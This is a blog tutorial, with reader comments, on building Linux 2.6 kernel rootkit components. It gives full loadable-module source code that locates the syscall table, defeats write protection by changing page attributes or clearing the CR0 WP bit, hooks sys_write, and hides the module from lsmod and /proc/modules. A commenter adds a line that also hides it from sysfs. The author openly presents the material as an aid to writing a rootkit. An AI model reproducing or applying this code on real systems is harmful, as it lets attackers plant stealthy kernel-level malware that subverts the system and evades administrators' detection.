Syscall Hijacking: Kernel 2.6.* systems
In this guide I will explain how to hijack a syscall on 2.6.* kernels: in particular, how to bypass the kernel's write protection of the syscall table and the write-protect (WP) bit of the CPU's CR0 register.
I won't explain what a syscall or the syscall table is: I assume you already know.
– Accessing the Syscall Table
If you have tried to run a rootkit written for 2.4.* kernels, you will know that it doesn't work on 2.6.* kernels.
In kernel 2.6.* the “sys_call_table” symbol is no longer exported, so you can't access it directly; moreover, the memory pages in which the table resides are now write-protected.
So we can no longer access the table in this way:
extern void *sys_call_table[];
...
sys_call_table[__NR_syscall] = pointer;
But the table is still in memory: if we know its address, we can access it through a simple pointer. There are many ways to find this address: the simplest is to search the “System.map” file in the “/boot” directory. This file is created each time a kernel is compiled: it lists the kernel's symbols together with their addresses.
An excerpt of this file follows:
spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic
...
c018d140 t cgroup_remount
c018d260 T cgroup_path
c018d310 t allocate_cg_links
c018d410 t find_css_set
c018d7d0 T cgroup_attach_task
c018da40 T cgroup_clone
c018dcc0 t cgroup_tasks_write
c018dd90 t cgroup_release_agent
c018df50 t proc_cgroup_show
c018e180 t cgroup_pidlist_find
c018e320 t cgroup_write_event_control
c018e610 t pidlist_allocate
c018e640 t pidlist_array_load
...
We are only interested in the “sys_call_table” address:
spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep sys_call_table
c05d2180 R sys_call_table
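Each “System.map” line has the form "address type name", so the lookup done with “grep” above can also be sketched in plain user-space C. This is only an illustration: the helper name “match_symbol” is hypothetical and not part of any kernel or libc API.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse one System.map line of the form "<hex address> <type> <name>".
 * Returns 1 and stores the address and the type letter if the symbol
 * name equals `wanted`; returns 0 otherwise.
 * Hypothetical helper, written only for this illustration.
 */
static int match_symbol(const char *line, const char *wanted,
                        unsigned long *addr, char *type)
{
    char name[128];
    unsigned long a;
    char t;

    assert(line != NULL && wanted != NULL);

    /* %lx reads the address, %c the type letter, %127s the symbol name */
    if (sscanf(line, "%lx %c %127s", &a, &t, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;

    *addr = a;
    *type = t;
    return 1;
}
```

Feeding it the line "c05d2180 R sys_call_table" yields the address 0xc05d2180 and the type letter 'R'; any other symbol name is rejected.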
– Bypass Kernel Write Protection
Now we have the table's address, but the 'R' in the output of the “grep” command means that the symbol lives in a “read-only” data section.
Indeed, the kernel places some structures in a “read-only” memory zone: in this way it protects them against intentional or unintentional changes that could lead to system instability. So we have to switch the pages holding such a structure to “read/write” mode if we want to modify it.
Fortunately, the kernel provides us with special functions for this task:
void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;
The “pages_rw” function makes the page passed as an argument writable; “pages_ro” makes it read-only again. But these functions take a “struct page” pointer, not a virtual address: for this task we can use “virt_to_page()”, which converts a kernel virtual address into the “struct page” describing the physical page that backs it. In order to use the “pages_*” functions we have to know their addresses. We can obtain them from the “System.map” file:
spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep -e pages_rw -e pages_ro
c012fbb0 T set_pages_rw
c012fe80 T set_pages_ro
Now we can access and modify the sys_call_table in this way:
...
unsigned long *syscall_table = (unsigned long *)0xc05d2180;
...
void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;
...
static int init(void)
{
    struct page *_sys_call_page;

    printk(KERN_ALERT "\nHIJACK INIT\n");

    /* pass the table's address itself, not the address of the pointer variable */
    _sys_call_page = virt_to_page(syscall_table);
    pages_rw(_sys_call_page, 1);

    // now we can use the sys_call_table
    ...
}
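The page functions work on whole pages, so it can help to see which page an entry of the table falls into. The following user-space sketch does only the address arithmetic, assuming 4 KiB pages and 4-byte table entries (32-bit x86); the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: 4 KiB pages, as on 32-bit x86 without large pages. */
#define PAGE_SIZE_4K UINT32_C(4096)

/* Address of entry `nr` in a table of 4-byte pointers (32-bit x86). */
static uint32_t entry_address(uint32_t table, uint32_t nr)
{
    return table + nr * UINT32_C(4);
}

/* Start address of the page that contains `addr`. */
static uint32_t page_base(uint32_t addr)
{
    uint32_t base = addr & ~(PAGE_SIZE_4K - 1);

    assert(base <= addr && addr - base < PAGE_SIZE_4K);
    return base;
}
```

With the table at 0xc05d2180 and __NR_write equal to 4 on 32-bit x86, the entry sits at 0xc05d2190, inside the page that starts at 0xc05d2000, so changing a single page is enough for this entry.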
This is the complete example source code (hijack.c):
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

/* addresses taken from System.map: they are specific to this kernel build */
unsigned long *syscall_table = (unsigned long *)0xc05d2180;

void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count)
{
    // hijacked write: log the call, then forward it to the original handler
    printk(KERN_ALERT "WRITE HIJACKED\n");
    return (*original_write)(fd, buf, count);
}

static int init(void)
{
    struct page *sys_call_page_temp;

    printk(KERN_ALERT "\nHIJACK INIT\n");

    /* pass the table's address itself, not the address of the pointer variable */
    sys_call_page_temp = virt_to_page(syscall_table);
    pages_rw(sys_call_page_temp, 1);

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = (unsigned long)new_write;

    return 0;
}

static void exit(void)
{
    struct page *sys_call_page_temp;

    sys_call_page_temp = virt_to_page(syscall_table);
    syscall_table[__NR_write] = (unsigned long)original_write;
    pages_ro(sys_call_page_temp, 1);

    printk(KERN_ALERT "MODULE EXIT\n");
    return;
}

module_init(init);
module_exit(exit);
Here is a “Makefile” to compile the source code:
obj-m := hijack.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
Now we can load our module:
spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
– Bypass CR0 Protection
On x86 CPUs, bit 16 of the CR0 control register is the write-protect (WP) bit: when it is set to 1, the CPU refuses writes to read-only pages even from kernel mode. Don't confuse it with bit 0 (PE), which enables “protected mode”, introduced in Intel CPUs starting from the Intel 80286. We can check whether our CPU supports this kind of protection in this way:
spaccio@spaccio-laptop:~$ cat /proc/cpuinfo | grep wp
wp : yes
wp : yes
Wikipedia has a brief description of the CR0 register: bit 0 (PE) deals with “protected mode”, while bit 16 (WP) deals with write protection. If WP is set to 1, the CPU is in “write-protect” mode; otherwise it is in “read/write” mode.
If the CPU is in “write-protect” mode and we try to load the “hijack.ko” module, the kernel will kill it:
spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
Killed
So if we set this bit to 0, we can write to read-only memory pages (including the syscall table).
Again, the kernel provides us with two functions:
#define read_cr0() (native_read_cr0())
#define write_cr0(x) (native_write_cr0(x))
The native read/write functions are defined as follows:
static inline unsigned long native_read_cr0(void)
{
    unsigned long val;
    asm volatile("movl %%cr0,%0\n\t" : "=r" (val));
    return val;
}

static inline void native_write_cr0(unsigned long val)
{
    asm volatile("movl %0,%%cr0" : : "r" (val));
}
The “read_cr0” function returns the value of the register CR0; the “write_cr0” function sets the bits of the register based on the value passed as parameter.
Now we can enable/disable the write protection in this way:
/*
 * Disable write protection.
 * NOT 0x10000 gives 0xFFFEFFFF on a 32-bit system: every bit is 1
 * except bit 16. ANDing the current value of the CR0 register with it
 * clears the WP bit and leaves all the other bits unchanged.
 */
write_cr0(read_cr0() & (~0x10000));

/*
 * Enable write protection.
 * ORing the current value of the CR0 register with 0x10000 sets the
 * WP bit back to 1.
 */
write_cr0(read_cr0() | 0x10000);
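The mask arithmetic can be checked in user space without touching the real register. This is a minimal sketch on plain 32-bit integers; the function names are hypothetical and the CR0 value used in the note below is only an illustrative bit pattern.

```c
#include <assert.h>
#include <stdint.h>

/* Bit 16 of CR0 is the write-protect (WP) bit. */
#define CR0_WP_MASK UINT32_C(0x10000)

/* Return `cr0` with the WP bit cleared; all other bits are preserved. */
static uint32_t cr0_clear_wp(uint32_t cr0)
{
    uint32_t result = cr0 & ~CR0_WP_MASK;

    assert((result & CR0_WP_MASK) == 0);
    return result;
}

/* Return `cr0` with the WP bit set; all other bits are preserved. */
static uint32_t cr0_set_wp(uint32_t cr0)
{
    uint32_t result = cr0 | CR0_WP_MASK;

    assert((result & CR0_WP_MASK) != 0);
    return result;
}
```

For example, the value 0x8005003b becomes 0x8004003b after clearing WP, and setting WP again restores 0x8005003b: only bit 16 changes.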
The modified “hijack.c” (“hijack2.c”) follows:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

/* address taken from System.map: it is specific to this kernel build */
unsigned long *syscall_table = (unsigned long *)0xc05d2180;

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count)
{
    // hijacked write: log the call, then forward it to the original handler
    printk(KERN_ALERT "WRITE HIJACKED\n");
    return (*original_write)(fd, buf, count);
}

static int init(void)
{
    printk(KERN_ALERT "\nHIJACK INIT\n");

    write_cr0(read_cr0() & (~0x10000));   /* clear the WP bit */

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = (unsigned long)new_write;

    write_cr0(read_cr0() | 0x10000);      /* set the WP bit again */

    return 0;
}

static void exit(void)
{
    write_cr0(read_cr0() & (~0x10000));   /* clear the WP bit */

    syscall_table[__NR_write] = (unsigned long)original_write;

    write_cr0(read_cr0() | 0x10000);      /* set the WP bit again */

    printk(KERN_ALERT "MODULE EXIT\n");
    return;
}

module_init(init);
module_exit(exit);
Makefile:
obj-m := hijack2.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
Now we can load our module without problems:
spaccio@spaccio-laptop:~$ sudo insmod hijack2.ko
spaccio@spaccio-laptop:~$
– Hide Kernel Module
We can easily hide our module by removing it from the module list (lsmod and /proc/modules). Look at the following source code (“hijack3.c”):
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

static int init(void)
{
    list_del_init(&__this_module.list);
    return 0;
}

static void exit(void)
{
    return;
}

module_init(init);
module_exit(exit);
We compile it with the following Makefile and then load it:
obj-m := hijack3.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
If we look through the lsmod output, we cannot find our module:
spaccio@spaccio-laptop:~$ sudo insmod hijack3.ko
spaccio@spaccio-laptop:~$ lsmod
Module                  Size  Used by
kernel_redir            2200  1
aes_i586                7280  2
aes_generic            26875  1 aes_i586
rfcomm                 33811  6
binfmt_misc             6599  1
sco                     7998  2
bnep                    9542  2
l2cap                  37008  16 rfcomm,bnep
vboxnetadp              6454  0
vboxnetflt             15216  0
...
spaccio@spaccio-laptop:~$ lsmod | grep hijack3
spaccio@spaccio-laptop:~$
This happens thanks to “list_del_init()” function. This function is defined as follows:
static inline void list_del_init(struct list_head *entry)
{
    __list_del(entry->prev, entry->next);
    INIT_LIST_HEAD(entry);
}
While the “__list_del()” and “INIT_LIST_HEAD()” functions are defined as follows:
static inline void __list_del(struct list_head *prev, struct list_head *next)
{
    next->prev = prev;
    prev->next = next;
}

static inline void INIT_LIST_HEAD(struct list_head *list)
{
    list->next = list;
    list->prev = list;
}
So the “list_del_init()” function unlinks our module's entry from the doubly linked list that the kernel uses to keep track of loaded modules: in this way the module cannot be found by lsmod (or in /proc/modules).
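The effect of the unlink can be reproduced in user space with a small copy of the list primitives. This is only a sketch: “struct fake_module”, the underscore-suffixed helpers and “list_contains” are hypothetical stand-ins, not the kernel's own definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct list_head { struct list_head *next, *prev; };

/* Stand-in for a module record; `list` is the first member on purpose. */
struct fake_module {
    struct list_head list;
    const char *name;
};

static void init_list_head_(struct list_head *l) { l->next = l; l->prev = l; }

/* Append `entry` at the tail of the circular list rooted at `head`. */
static void list_add_tail_(struct list_head *entry, struct list_head *head)
{
    struct list_head *last = head->prev;

    entry->prev = last;
    entry->next = head;
    last->next = entry;
    head->prev = entry;
}

/* Unlink `entry` from its neighbours, then make it point to itself. */
static void list_del_init_(struct list_head *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
    init_list_head_(entry);
}

/* Walk the list the way a listing tool would; return 1 if `name` is found. */
static int list_contains(const struct list_head *head, const char *name)
{
    const struct list_head *p;

    assert(head != NULL && name != NULL);
    for (p = head->next; p != head; p = p->next) {
        /* valid cast: `list` is the first member of struct fake_module */
        const struct fake_module *m = (const struct fake_module *)p;
        if (strcmp(m->name, name) == 0)
            return 1;
    }
    return 0;
}
```

After “list_del_init_()” is called on one entry, a walk from the list head no longer reaches it, while the entry itself stays in memory and its neighbours remain linked to each other.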
– Conclusion
The post is finished and I hope that it can help you to write your own modules (or rootkit :) ).
Bye.
great work mate :)
great work, is very nice topic
hi,
when i try doing this trick on my box, thereis a few questions in my dumb brain:
– why u are using 0x10000 value when try to enable/disable cr0 on protected mode?
– if only ‘disable cr0 wp’ trick can bypass protection of at all.
why still need to disable page protection by ‘pages_rw((virt_to_pages…. ‘?
Hi Vjick, I have modified the post after your comment:
– now you can read the answer from the post;
– we don’t still need to disable the page protection with ‘pages_rw((virt_to_pages…. ‘: I have made a mistake in “cut & paste”.
Bye bye.
thanks for your reply, styx^..
btw, i can understand how the logic of AND,OR,and negation(~) in manipulating cpu register.
but im still confuse, why that 5th bit[(0x00010000) -cmiiw-] from the register value must be 1, while PE flags is in bit 0 and WP flags is in bit 16 (according to http://en.wikipedia.org/wiki/Control_register#CR0).
how can that happen? ;p
or maybe in overall, why the value must be [0x01111 / 0x10000] not [0x01111111 / 0x10000000] like in the common bit x86 cpu register to perform enable/disable PE?
thanks you, just confusing question in my humble-dumble head..
Hi Vjick:
– 0x10000 (hexadecimal) stands for 000…010000000000000000 (binary)
– ~(0x10000) stands for 111…1101111111111111111
As you can see, the 17th bit (WP, bit 16 counting from zero) is set to 0. So you can write to memory pages that were previously read-only.
Bye bye.
yeah.. my fault, i jst wrong while convert(negationing) value in hex, not binary.
thanks you, styx.
Instead of using hardcoded addresses you could parse memory between 0xc0000000 and 0xd0000000 (x86) and check for the syscall table.
You are right. Soon I’ll write a post about it.
Thank you for the hint.
Nice post.
On a side note Centos5.5 (probably other RH based distros?) does not provide pages_rw() and pages_ro() functions.
I don’t know how the Centos5.5 kernel works.
If you have tested my codes and they don’t work then you could/should be right :-).
Absolutely awesome writeup!!!
Will/can this method be used for hijacking kernel functions (not syscalls) given their address from System.map? If so, can you point me how to replace a function call with given address and parameter list?
Yes, you can do that, but I’ve never tried it. I think that the steps are the same as for syscall hijacking.
Bye.
Great writeup.
One question, can this method be done on a 64 bit machine.
pages_rw
pages_ro
Doesn’t exist in the System.map. What would be the equiv?
I don’t know the answer because I don’t have a 64 bit machine. Have you searched for set_memory_rw() and set_memory_ro() functions?
Bye.
I run 64-bit too.. have the following page/memory functions for 2.6.36:
ffffffff8102f1f0 T set_pages_rw
ffffffff8102ebe0 T set_memory_rw
ffffffff81a7c6b0 r __ksymtab_set_memory_rw
ffffffff81a8bdf8 r __kcrctab_set_memory_rw
ffffffff81a909e8 r __kstrtab_set_memory_rw
.
ffffffff8102f1b0 T set_pages_ro
ffffffff8102ebb0 T set_memory_ro
ffffffff81a7c6c0 r __ksymtab_set_memory_ro
ffffffff81a8be00 r __kcrctab_set_memory_ro
ffffffff81a909f6 r __kstrtab_set_memory_ro
Which one is correct to use? set_pages_xx or set_memory_xx?
You have to use set_pages_xx as you can read in the post.
These functions are defined in “arch/x86/mm/pageattr.c”:
int set_pages_ro(struct page *page, int numpages)
{
    unsigned long addr = (unsigned long)page_address(page);

    return set_memory_ro(addr, numpages);
}

int set_pages_rw(struct page *page, int numpages)
{
    unsigned long addr = (unsigned long)page_address(page);

    return set_memory_rw(addr, numpages);
}
As you can see they call the set_memory_xx functions.
Bye.
It seems that including <asm/system.h> provides the native read_cr0 and write_cr0 calls; that was enough to replace some function calls with my own, without using the set_memory/set_pages family. However, for some reason I suspect that the replacement function didn’t receive the passed arguments.. cheers.
Modules are not hidden in sysfs
you can use :
kobject_del(__this_module.holders_dir->parent);
Dear Blog-Author,
What a beautiful article this is! The way you have poured the concept is inspirative.
I liked this page, and the content remained helpful to me. I am thankful to you.
Thanks.
N. A. Joshi
thanks for sharing very much appreciated – mabuhay
Thanks for the post.